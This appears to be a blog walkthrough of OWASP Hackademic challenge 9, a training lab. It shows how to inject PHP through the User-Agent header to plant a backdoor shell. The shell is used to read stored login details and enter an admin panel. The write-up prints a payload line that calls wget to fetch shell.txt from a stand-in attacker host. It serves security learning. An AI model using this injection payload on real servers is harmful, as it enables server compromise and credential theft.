Another day, another challenge.
Today’s post will be on the ninth challenge from the OWASP Hackademic Challenge.
Below is the scenario:
A friend of yours has set up a news blog at slagoff.com. However, he is kind of worried regarding the security of the news that gets posted on the blog and has asked you to check how secure it is.
Your objective is to determine whether any vulnerabilities exist that, if exploited, can grant access to the blog’s server.
Hint: A specially-tailored backdoor shell can be found at “http://www.really_nasty_hacker.com/shell.txt“.
Below is the solution
Clicking the first link we are presented with the following screen:
Doing a right click, view page source we get the following:
We noticed there’s a hidden field with the value of answer.php, with a name of page. Hmm… let’s see if we can access this page.
Putting the following address in the URL bar it seems we cannot access the file.
From the description we know that we need to upload a file from http://www.really_nasty_hacker.com/shell.txt
We know that our page is using php. Let’s see if we can modify the User-Agent using php syntax.
Opening Tamper Data after we enter the comment we’re presented with the following:
Changing the User-Agent to:
<?system(“wget http://www.really_nasty_hacker.com/shell.txt”);?>
Pressing “OK” we get the following:
Our script was uploaded successfully!
Going to the new site we see the following:
Hmm… We’re presented with a command line similar to challenge 8!
Let’s do a ls to see what we have on the file system.
Well we see that there is a file named “sUpErDuPErL33T.txt”
Let’s see what’s in this file.
We’re presented with login information.
Looking back at the command file we see the following file adminpanel.php
Going to that file we see the following:
An admin portal!
Let’s enter our login information and see what we get:
We passed the challenge!!!
Lessons learned:
We did our right click view page source which showed that we had a hidden file named answer.php. Trying to access this file didn’t help us. Next changing the user agent we were able to upload our file to the file system. Going to the file on the file system we noticed that the file allows us to execute commands. Executing the commands were able to find the login information and login successfully.
Use the knowledge you’ve learned to solve the next challenge. We were first introduced to user-agents in challenge #5 with the p0wnbrowser product. We know that we can change the user-agent to show content that we would’ve never noticed.
